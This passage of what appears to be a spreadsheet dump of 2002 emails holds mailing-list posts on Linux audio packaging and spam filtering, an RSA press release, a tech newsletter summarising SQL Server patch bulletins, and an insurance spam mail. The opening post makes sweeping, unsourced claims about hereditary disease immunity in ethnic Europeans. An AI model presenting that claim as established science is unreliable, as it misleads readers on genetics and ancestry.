 severe tolls on the population.  Modern ethnic Europeans have genetics that
 survived a unique and brutal culling process by a rather extensive range of
 diseases over dozens of generations.
 What the geneticists are discovering is that for a great many of the world's
 most common infectious diseases, there is a percentage of the ethnically
 European population that has hereditary immunity and an even larger segment
 that has at least some hereditary resistance compared to people from other
 parts of the world.  And for most ethnic Europeans it isn't just one
 disease, they have varying levels of genetic resistance to a veritable
 cornucopia of infectious diseases.  Because of similarities in the
 mechanisms and characteristics of viruses and other pathogens around the
 world to ones that Europeans were exposed to, the robust defenses their
 genetics provided them against their native diseases frequently imparted
 some resistance to diseases which they had never been exposed.
 Cheers,
 -James Rogers
  jamesr@best.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MSNBC: Rates Hit 18 year Low 4.75% ...28940
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ville wrote :
 &gt; Ah!  The mixer stuff was what made me look for an init script in the
 &gt; first place, I didn't bother to check whether the existing stuff would
 &gt; have worked with that.  Will try that out, you can assume silence ==
 &gt; success :)
 Well, from what I've tried, both the main and the PCM (at least) volume
 levels can be controlled either by "alsamixer" or the good old "aumix".
 &gt; &gt; &gt;From what I can tell after only 2 days using it : ALSA rocks,
 &gt; &gt; &gt;especially
 &gt; &gt; since having a full OSS compatibility results that it breaks nothing at
 &gt; &gt; all! :-)
 &gt; 
 &gt; Agreed.  Though with only 2 hours experience...
 I guess/hope some other people from the list will try it out ;-)
 Both problems you reported (libasound.so and wrong xine dependency) are now
 fixed in the current packages.
 Oh, it's maybe also worth pointing out : I've implemented at last sorting
 by both last change date and alphabetically for my "build list" in the php
 code : http://freshrpms.net/builds/
 And yes, I accept patches/comments/suggestions about all those spec files!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</si>
  <si>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&gt; Ben Mord said:
 &gt; 
 &gt; &gt;Ah. In that case, you can use something considerably less powerful than
 &gt; &gt;VMWare. All you need is a machine configured to boot from CD-ROM and use
 &gt; &gt;a RAM disk for scratch space. Numerous Linux distros are available that
 &gt; &gt;let you boot a stateless but functional system from CD-ROM.
 &gt; 
 &gt; But RAM is expensive, and the directory structures of many systems (e.g.
 &gt; Windows) are not sufficiently organized and standardized to make this
 &gt; combination of bootable CDs and RAM drives practical. Even if you are
 &gt; fortunate enough to be using Linux (or another FHS-compliant *nix), you
 &gt; still can't fit a lot on a CD. Its not unusual today to have gigabytes of
 &gt; static multimedia content on the web server. This particular problem can be
 &gt; alleviated somewhat by using DVDs, but this is a temporary solution at best
 &gt; which will become outdated quickly as our data requirements grow and hard
 &gt; drives become cheaper.
 So, just write-protect the hard disk for partitions that are static.
 I seem to recall an article on this (early 80's, Byte magazine, perhaps?)
 for BBS systems or for testing unknown (perhaps trojan horse) software.
  - George
 -- 
  ----------------------------------------------------------------------
   George Dinwiddie                             gdinwiddie@alberg30.org
   The gods do not deduct from man's allotted span those hours spent in
   sailing.                                    http://www.Alberg30.org/
  ----------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: RSA (repost)
</t>
  </si>
  <si>
    <t xml:space="preserve">"Adam L. Beberg" wrote:
 &gt; 
 &gt; So, who has done RSA implementation before?
 &gt; Having a typo-I-cant-spot problem with my CRT...
 &gt; 
 &gt; - Adam L. "Duncan" Beberg
 &gt;   http://www.mithral.com/~beberg/
 &gt;   beberg@mithral.com
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 Done a ton of them, both with and without their
 stuff.  With is definitely easier.[1]
 Greg
 [1] http://www.endeavors.com/PressReleases/rsa.htm
  Endeavors Technology and RSA Security Form Strategic Partnership to 
  Enhance SSL Performance in Secure, Enterprise-Scalable P2P Computing
 Endeavors Technology and RSA Security combine their respective peer-to-peer Magi Enterprise 
 Web collaboration and RSA BSAFE software for SSL users to instantly extend security and improve performance
 of 
 desktop and corporate data sharing, and Web interaction between workgroups inside and across corporations.
 Irvine (CA) and Cambridge (UK), September 12, 2002 - Secure web collaboration software leader Endeavors
 Technology, Inc. today
 announced a technology sharing and marketing agreement with RSA Security Inc. the most trusted name in
 e-security. This strategic
 partnership is aimed at extending the security and improving the performance of the standard SSL security
 protocol used by every e-based
 desktop, laptop and server. 
 Under the terms of the agreement, RSA Security's trusted security tools are embedded into Endeavors
 Technology's award-winning Magi
 Enterprise software product. The combined solution enables IT managers and users to simply extend security and
 encryption to every
 Magi-enabled device for the direct device-to-device sharing and interaction of corporate data and workflow
 between workgroups within and
 beyond the enterprise.
 Secure collaboration between desktops and corporate systems calls for enterprises to build complex and costly
 network infrastructures. This
 combination of technologies from the two companies eliminates both overheads, and also the need for specific
 security tools for each desktop
 application such as Microsoft Project. With Magi's secure RSA Security-based peer environment, collaboration
 can now be rapidly, easily and
 securely extended across all devices and company firewalls, and workgroups can interact with colleagues,
 partners and clients without concern
 in compromising corporate information. This brings true Internet scaling to corporations needing to interact
 highly securely with strong
 encryption and authentication across firewalls.
 "In these challenging times, there can be no compromise in safeguarding corporate data and knowledge," says
 Bernard Hulme, chairman and
 CEO of Endeavors Technology. "Embedding RSA Security encryption software into Magi products provides IT
 managers with added
 assurance, speed and cost savings, and a proven security net to accelerate the deployment of business-centric
 peer-to-peer computing"
 Endeavors Technology joins the RSA Secured Partner Program. The program is designed to ensure complete
 interoperability between
 partner products and RSA Security's solutions including RSA SecurID two-factor authentication, RSA
 ClearTrust Web access
 management, RSA BSAFE encryption and RSA Keon digital certificate management.
 The strategic partnership paves the way for Magi Enterprise to bear the RSA Secured brand on product packaging
 and advertising, be listed in
 RSA Secured Partner Solutions directories, and have RSA Security's out-of-the-box, certified interoperability.
 It will also lead to joint
 marketing and promotional activities between the two firms, mutual field sales engagement opportunities on
 joint accounts, and 24x7 worldwide
 business continuity support.
 "Endeavors Technology is taking a leadership role by providing the highest-level of security in its enterprise
 products and streamlining the
 deployment process for IT managers," says Stuart Cohen, director of partner development at RSA Security. "By
 combining our products,
 enterprise customers have a solution that provides encryption and authentication across firewalls."
 About Magi
 Magi Enterprise 3.0, an award-winning web collaboration system, transforms today's Web into a highly secure
 inter- and intra-enterprise
 collaboration network. For the first time, enterprises can implement ad-hoc Virtual Private Networks for
 collaboration very rapidly and
 affordably without disrupting existing applications, networks or work practices. Magi Enterprise 3.0 does this
 by effectively transforming
 unsecured, "read-only" Web networks into two-way trusted and transparent collaboration environments, through
 the use of such features as
 cross-firewall connections, advanced data extraction, an intuitive graphical interface, and universal name
 spaces generating "follow me URLs"
 for mobile professionals.
 About RSA Security, Inc.
 RSA Security Inc., the most trusted name in e-security, helps organizations build secure, trusted foundations
 for e-business through its RSA
 SecurID two-factor authentication, RSA ClearTrust Web access management, RSA BSAFE encryption and RSA Keon
 digital certificate
 management product families. With approximately one billion RSA BSAFE-enabled applications in use worldwide,
 more than ten million RSA
 SecurID authentication users and almost 20 years of industry experience, RSA Security has the proven
 leadership and innovative technology to
 address the changing security needs of e-business and bring trust to the online economy. RSA Security can be
 reached at
 www.rsasecurity.com.
 About Endeavors Technology, Inc.
 Endeavors Technology, Inc. is a wholly-owned subsidiary of mobile computing and network infrastructure vendor
 Tadpole Technology plc
 (www.tadpole.com), which has plants and offices in Irvine and Carlsbad (California), and Cambridge, Edinburgh,
 and Bristol (UK). For further
 information on Endeavors' P2P solutions, call 949-833-2800, email to p2p@endeavors.com, or visit the company's
 website
 www.endeavors.com. 
 Copyright 2002 Endeavors Technology, Inc. Magi, and Magi Enterprise are registered trademarks of Endeavors
 Technology, Inc. RSA, BSAFE, ClearTrust, Keon, SecurID, RSA Secured and The Most
 Trusted Name in e-Security are registered trademarks or trademarks of RSA Security Inc. in the United States
 and/or other countries. All other products and services mentioned are trademarks of their
 respective companies. 
             2002 Endeavors Technology, Inc., 19600 Fairchild, Suite 350, Irvine, CA 92612, phone
 949-833-2800, fax 949-833-2881, email info@endeavors.com.
                            All rights reserved; specifications and descriptions subject to change without
 notice.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Culture Jamming
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000222.html
 Date: 2002-10-03T22:15:49-08:00
 The defective yeti isn't fond of Culture Jam. I read it a year or so ago and 
 joined Adbusters as a result. I liked the book, but more importantly, I liked 
 the message. It resonated with me. A lot. Yes,...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Tech Specialist]  Tantamount Revelation
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020715.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020715.html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&lt;/style&gt;&lt;title&gt;20020715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href="http://www.qksrv.net/click-471546-5924457"&gt;
 &lt;img src="http://www.qksrv.net/image-471546-5924457" width="468" height="60" alt="" border="0"&gt;&lt;/a&gt;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07.15.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Hackers and crackers respect only one thing:&lt;/b&gt; &lt;font color="blue"&gt;strong security&lt;/font&gt;. 
 Keep the bad guys
 out of your PC or network with the advanced technology that's trusted by millions: 
 ZoneAlarm Pro 3.0. This best-in-class personal firewall stops hackers cold, defends
 your online privacy,and sets up in minutes. 
 &lt;a href="http://psstt.com/1/c/64021/63809/190955/190955"&gt;Click here to download now&lt;/a&gt;!   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 As if there weren't enough hypocrisy and misinformation 
 being spewed by marketing and sales departments. This time, 
 a &lt;a href="http://idg.net/ic_886816_1794_9-
 10000.html"&gt;startling revelation&lt;/a&gt; that Microsoft refuses 
 to use their own ISA Server to protect themselves from the 
 very things the product is meant to stop - worms and 
 intrusion. Nimda was turned loose within Microsoft and 
 they've chosen NetScreen's 500 series security appliance to 
 cure what ills them. I find this staggeringly hilarious, to 
 say the least. The move is tantamount to Intel deploying 
 desktops based on AMD processors!
 &lt;p&gt;Ok, so a hardware solution might be better than a 
 software defense in many cases. I suppose we can't entirely 
 blame Microsoft for opting to go that route. Probably a wise 
 decision, in fact - admit defeat and move on. However, why 
 is Nimda spreading within the corporate walls to the point 
 that they felt the needed to make such a leap in the first 
 place? After all, patches were released months ago, so IIS 
 is impervious to attack now. Still considering the 
 deployment of IIS as your web server platform of choice? 
 Things that make you go hmmmm...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&lt;b&gt;SQL Server Install Leaves Passwords Behind&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.microsoft.com/technet/security/bulletin/MS02-035.asp"&gt;http://www.microsoft.com/technet/security/bulletin/MS02-035.asp&lt;/a&gt;
 &lt;p&gt;During the installation of SQL Server 7.0 or 2000, 
 various bits of configuration information are stored in a 
 setup.iss file, including account passwords that have been 
 captured in order to configure the services. Prior to 
 certain service packs, these passwords are stored as clear 
 text, which is problematic because the file is left on the 
 hard drive after the installation process is completed. 
 Peruse the details of the bulletin to be sure you've cleaned 
 up any relevant bits and pieces applicable to your 
 environment.
 &lt;p&gt;&lt;br&gt;&lt;b&gt;SQL Server Cumulative Patch&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.microsoft.com/technet/security/bulletin/MS02-034.asp"&gt;http://www.microsoft.com/technet/security/bulletin/MS02-034.asp&lt;/a&gt;
 &lt;p&gt;A new roll-up patch is available for SQL Server that takes 
 care of all previous security issues, plus a trio of new 
 items. Two buffer overrun vulnerabilities exist that could 
 allow an attacker to gain control over the server, and a 
 different privilege elevation flaw can be exploited due to 
 improper permissions within the registry. All three are 
 spackled over by the latest cumulative patch described 
 further in this bulletin.
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Win2K Memory Allocation Adjustments&lt;/b&gt;
 &lt;br&gt;Unearthed by Wayne Clark
 &lt;p&gt;&lt;a class="url" href="http://searchwin2000.techtarget.com/tip/0,289483,sid1_gci835208,00.html"&gt;http://searchwin2000.techtarget.com/tip/0,289483,sid1_gci835208,00.html&lt;/a&gt;
 &lt;p&gt;Most Windows 2000 servers tune themselves fairly well and 
 do not need further tweaking. In those cases, it's best to 
 just leave things alone unless you specifically identify a 
 problem somewhere. Serdar Yegulalp has an excellent 
 explanation of one particular situation where memory pools 
 can be exhausted and crash the server. Before you go diving 
 into the registry to play with the knobs and buttons, be 
 certain you know what you're messing with or you could just 
 make things worse. Backups, backups, backups.
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q325582"&gt;Q325582 - FIX: Output Data Overwritten When Input Data Is Larger than Destination Field (Q325582)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q305356"&gt;Q305356 - Windows XP Prompts You to Re-activate After You Restore Your Computer (Q305356)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q304622"&gt;Q304622 - CAPS LOCK Key Behavior with 16-Bit VDM Is Incorrect for French MultiLanguage Versions of Windows (Q304622)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q235063"&gt;Q235063 - Error C00D0035 Using Windows Media Player (Q235063)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q277843"&gt;Q277843 - FIX: Restore of Log in Standby Mode May Cause 9004 Error Message if the Original Database has Shrink Enabled (Q277843)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt; 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;GET WINDOWS XP TIPS:&lt;/b&gt; Months after the release of Windows XP Professional and Home editions, people are still learning the nuances of Microsoft's newest operating system. Whether you've been using it for a while or are planning to upgrade to the new OS soon, this ebook is right up your alley. 
 &lt;a href="   http://store.eSellerate.net/s.asp?s=STR550611850&amp;Cmd=BUY&amp;SKURefnum=SKU3000768669&amp;AFFIDC=AFF669529939"&gt;GET YOUR COPY&lt;/a&gt; 
 of Lockergnome's Top 50 Windows XP tips now!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;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&lt;b&gt;Sorting IP Addresses Via Script&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.i386.com/Default.asp?page=docs/scripting-ip2long.htm&amp;category=admin&amp;id=1046"&gt;http://www.i386.com/Default.asp?page=docs/scripting-ip2long.htm&amp;category=admin&amp;id=1046&lt;/a&gt;
 &lt;p&gt;Documentation is everything. If you have a handle on your 
 network configuration, it's much easier to manage. IP 
 addresses are one bit of information that must be properly 
 tracked, but often it's a manual effort to enter and sort 
 data. Using the script techniques provided in this brief 
 article, you can convert an address to a 32-bit number, 
 perform the sort, then convert back to the standard dotted 
 decimal format. An Excel sample spreadsheet is also provided 
 to get you started.
 &lt;!-- GnomeSTUFF --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Broadband Sharing Crackdown&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://news.com.com/2100-1033-942323.html"&gt;http://news.com.com/2100-1033-942323.html&lt;/a&gt;
 &lt;p&gt;Those of us with wireless networking equipment might be 
 tempted to allow the neighbors to share the wealth, but be 
 careful. Broadband companies are catching on and putting a 
 stop to the practice. What's concerning to me is that I 
 don't share my wireless network, but I do use quite a few 
 different machines at any given time. If someone is snooping 
 around and seeing a lot of different sessions and gets 
 curious, might I be subject to a teeth-kicking?
 &lt;p&gt;
 &lt;b&gt;Virtual Sketching&lt;/b&gt;
 &lt;br&gt;Discovered by Diana
 &lt;p&gt;&lt;a class="url" href="http://members.bellatlantic.net/~vze2mfh8/"&gt;http://members.bellatlantic.net/~vze2mfh8/&lt;/a&gt;
 &lt;p&gt;I believe I still have an old Etch-A-Sketch in a box 
 somewhere. Maybe I should dig it back out and webify the 
 thing just for grins. Check out this example of novelty web 
 programming, assuming y'all don't kill the site. If it's 
 down, check back later. Using a web form, you can enter the 
 moves you'd like to see represented on the pad, which is 
 viewed through a live webcam. I'd love to see someone craft 
 the Lockergnome logo. Impress me...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href="http://www.lockergnome.com/issues/techspecialist/20020715.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020715.html&lt;/a&gt;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</si>
  <si>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Now we are 10
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723996,215/
 Date: 2002-10-10T03:26:55+01:00
 *Media:* *Peter Preston* on the question that split the Guardian into two - 
 broadsheet and tabloid.
</t>
  </si>
  <si>
    <t xml:space="preserve">  Can you send more details about the error?
   and also do a 'razor-report -v' to make sure 2.x is being called.
   -chad
 On 11/08/02 21:09 -0500, Mike Burger wrote:
 ) Ok...I need to amend this.
 ) 
 ) I don't get the error when I check the spam...just when I go to report it.
 ) 
 ) On Sun, 11 Aug 2002, Mike Burger wrote:
 ) 
 ) &gt; I did...unfortunately, now I get this:
 ) &gt; 
 ) &gt; Died at /usr/bin/razor-check line 32, &lt;GEN0&gt; line 1.
 ) &gt; 
 ) &gt; Did I need to remove and reinstall, or something.  I just did a make 
 ) &gt; install over the existing installation.
 ) &gt; 
 ) &gt; On Sun, 11 Aug 2002, Vipul Ved Prakash wrote:
 ) &gt; 
 ) &gt; &gt; On Sun, Aug 11, 2002 at 07:39:41AM -0500, Mike Burger wrote:
 ) &gt; &gt; &gt; 
 ) &gt; &gt; &gt; Any ideas what might have changed, here? I'm running razor-agents-2.12, 
 ) &gt; &gt; &gt; and razor-agents-sdk-2.0.3.
 ) &gt; &gt; 
 ) &gt; &gt; Mike, 
 ) &gt; &gt; 
 ) &gt; &gt; Please upgrade to 2.14 as many bugs were fixed between the two releases, and 
 ) &gt; &gt; see if your problem persists.
 ) &gt; &gt; 
 ) &gt; &gt; cheers,
 ) &gt; &gt; vipul.
 ) &gt; &gt; 
 ) &gt; &gt; 
 ) &gt; 
 ) &gt; 
 ) &gt; 
 ) &gt; -------------------------------------------------------
 ) &gt; This sf.net email is sponsored by:ThinkGeek
 ) &gt; Welcome to geek heaven.
 ) &gt; http://thinkgeek.com/sf
 ) &gt; _______________________________________________
 ) &gt; Razor-users mailing list
 ) &gt; Razor-users@lists.sourceforge.net
 ) &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 ) &gt; 
 ) 
 ) 
 ) 
 ) -------------------------------------------------------
 ) This sf.net email is sponsored by:ThinkGeek
 ) Welcome to geek heaven.
 ) http://thinkgeek.com/sf
 ) _______________________________________________
 ) Razor-users mailing list
 ) Razor-users@lists.sourceforge.net
 ) https://lists.sourceforge.net/lists/listinfo/razor-users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</si>
  <si>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15 Ways to Collect on a Life Policy
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_14C159_01C237E6.C5B22F30
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  The Non-Death Life Policy
  Critical Illness Life Insurance 
  This is not a terminal illness policy!	
  15 Valuable Lifetime Benefits
 100% of the Face Amount	 
 Heart Attack	 Stroke	 Invasive Cancer	 HIV (for Medical
 Personnel)	 
 Paralysis	 Organ Transplant	 Severe Burns	 Loss of
 Independent Living	 
 Terminal Illness	 Kidney Failure	 Blindness	 Death By Any
 Cause	 
 25% of the Face Amount	 
 Coronary Artery Bypass	 Non-invasive Cancer	 
 10% of the Face Amount	 
 Coronary Angioplasty	 
 Worksite Marketing	 Individual Sales	 
 ? Guaranteed Issue for Groups of 25+	 ? Up to $1,000,000 maximum
 ? Electronic Enrollment	 ? Simplified Issue up to $100,000	 
 ? Unlimited billing options	 ? Commission advance available	 
  Don't forget to ask about our matching retirement plan!	
 To learn more, please call us today!
  800-626-7980
 ? or ? 	
 Please fill out the form below for more information	 
 Name:	  	
 Address:	  	
 City:	  	State:	  	Zip:	  	
 E-mail:	  	
 Phone:	  	
 Area of Interest:	  Worksite        Individual Sales 	 Both 	
  	  Personal Producer      Manager 	 Number of Agents 	
  National Traveler's Life Co.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------=_NextPart_000_14C159_01C237E6.C5B22F30
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;15 Ways to Collect on a Life Policy&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 bgcolor=3D"#ffffff" border=3D"1" bordercolor=3D"#000000" =
 align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
       &lt;img src=3D"http://iiq.us/images/ntl/20020514-101b.jpg" =
 width=3D"550" height=3D"56" alt=3D"The Non-Death Life Policy"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/ntl/20020514-102b.jpg" =
 width=3D"273" height=3D"70" alt=3D"Critical Illness Life Insurance"&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/20020514-103b.jpg" width=3D"277" =
 height=3D"70"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/ntl/20020514-104b.jpg" =
 width=3D"550" height=3D"268"&gt;&lt;br&gt;
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/20020617-6.gif" width=3D"463" =
 height=3D"60" alt=3D"This is not a terminal illness policy!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;img src=3D"http://iiq.us/images/ntl/20020617-1.gif" =
 width=3D"435" height=3D"105" alt=3D"15 Valuable Lifetime Benefits"&gt;&lt;br&gt;
             &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;=20
             &lt;table width=3D"100%" border=3D"1" cellspacing=3D"0" =
 cellpadding=3D"2" bordercolor=3D"#000000" bgcolor=3D"#CCCCCC"&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"4" bgcolor=3D"#333366" =
 align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"2" color=3D"#FFFFFF"&gt;100% of the Face =
 Amount&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td height=3D"22"&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Heart =
 Attack&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td height=3D"22"&gt;&lt;b&gt;&lt;font =
 size=3D"1"&gt;Stroke&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td height=3D"22"&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Invasive =
 Cancer&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td height=3D"22"&gt;&lt;b&gt;&lt;font size=3D"1"&gt;HIV (for Medical =
 Personnel)&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Paralysis&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Organ Transplant&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Severe Burns&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Loss of Independent =
 Living&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Terminal Illness&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Kidney Failure&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Blindness&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Death By Any =
 Cause&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"4" bgcolor=3D"#FFFFFF" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/ntl/spacer.gif" =
 width=3D"8" height=3D"8"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"4" bgcolor=3D"#333366" =
 align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"2" color=3D"#FFFFFF"&gt;25% of the Face =
 Amount&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td colspan=3D"2"&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Coronary Artery =
 Bypass&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td colspan=3D"2"&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Non-invasive =
 Cancer&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td colspan=3D"4" bgcolor=3D"#FFFFFF"&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/spacer.gif" width=3D"8" =
 height=3D"8"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td colspan=3D"4" bgcolor=3D"#333366"&gt;&lt;b&gt;&lt;font =
 size=3D"2" color=3D"#FFFFFF"&gt;10% of the Face Amount&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td colspan=3D"4"&gt;&lt;b&gt;&lt;font size=3D"1"&gt;Coronary =
 Angioplasty&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;br&gt;
             &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"4" =
 face=3D"Arial, Helvetica, sans-serif"&gt;Worksite Marketing&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"4" =
 face=3D"Arial, Helvetica, sans-serif"&gt;Individual Sales&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/spacer.gif" width=3D"240" =
 height=3D"1"&gt;&lt;/td&gt;
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/spacer.gif" width=3D"240" =
 height=3D"1"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2" face=3D"Verdana, =
 Arial, Helvetica, sans-serif"&gt;&amp;#149;&amp;nbsp;Guaranteed Issue for Groups of =
 25+&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2" face=3D"Verdana, =
 Arial, Helvetica, sans-serif"&gt;&amp;#149;&amp;nbsp;Up to $1,000,000 =
 maximum&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2" face=3D"Verdana, =
